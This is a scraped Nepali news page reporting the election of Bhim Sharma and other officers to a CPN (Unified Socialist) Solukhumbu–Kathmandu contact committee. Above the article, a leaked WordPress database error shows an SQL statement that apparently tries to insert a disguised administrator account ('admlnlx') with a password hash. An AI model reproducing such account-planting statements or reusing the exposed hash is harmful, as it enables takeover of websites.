WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BVsRRyJP81quIlXcjbR/Xs8EYp.pzB.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 01:56:41', '', 'admlnlx', 'admlnlx')

नेकपा (एस) सोलुखुम्बु–काठमाडौँ सम्पर्क कमिटीको अध्यक्षमा शर्मा – Gaule Khabar

नेकपा (एस) सोलुखुम्बु–काठमाडौँ सम्पर्क कमिटीको अध्यक्षमा शर्मा

नेकपा (एस) सोलुखुम्बु–काठमाडौँ सम्पर्क कमिटीको अध्यक्षमा शर्मा

काठमाण्डौं । नेकपा एमाले विभाजनपछि बनेको नेकपा एकीकृत समाजवादी पार्टीले सोलुखुम्बु–काठमाडौँ सम्पर्क कमिटीको अध्यक्षमा भीम शर्मा चयन हुनुभएको छ।

शनिबार काठमाडौँमा आयोजित भेलाले सोलुखुम्बु–काठमाडौँ सम्पर्क कमिटीको भेलाले शर्माको अध्यक्षतामा चयन ४५ सदस्यीय सोलुखुम्बु–काठमाडौँ सम्पर्क कमिटी कमिटी बनाएको हो ।

कमिटीको वरिष्ठ उपाध्यक्ष लाक्पा गेल्जे शेर्पा प्रथम उपाध्यक्षमा सागर तामाङ, उपाध्यक्ष तेन्जी शेर्पा, सचिवमा दोर्जी शेर्पा र सह–सचिवमा शेखर राई चयन हुनुभएको छ। त्यस्तै, कोषाध्यक्षमा बविता राउतलाई चयन गरिएको छ ।नवगठित कमिटीलाई प्रमुख अतिथि तथा केन्द्रीय सदस्य बिजय गुरुङले सपथ ग्रहण गराउनुभएको छ ।

भेलालाई सम्बोधन गर्दै प्रमुख अतिथि गुरुङले समाजवादी दृष्टिकोणले नै मुलुकलाई निकास दिने दाबी गर्नुभयो । कार्यक्रम प्रदेश १ ९क० सदस्य आङ ङिमा लामा, सम्पर्क समन्वय इन्चार्ज आङ कामी शेर्पा लगायत नेताहरुको सहभागी रहेकोे थियो ।

निर्वाचन आयोगबाट ९ भदौमा दल दर्ताको प्रमाण पत्र पाएको नेकपा एसले जिल्ला र प्रदेश कमिटी गठनलाई तीव्रता दिएको छ । यसैबीच शुक्रबार काठमाडौंस्थित मीनभवनमा पार्टीको केन्द्रीय कार्यालय पनि उद्घाटन गरिएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका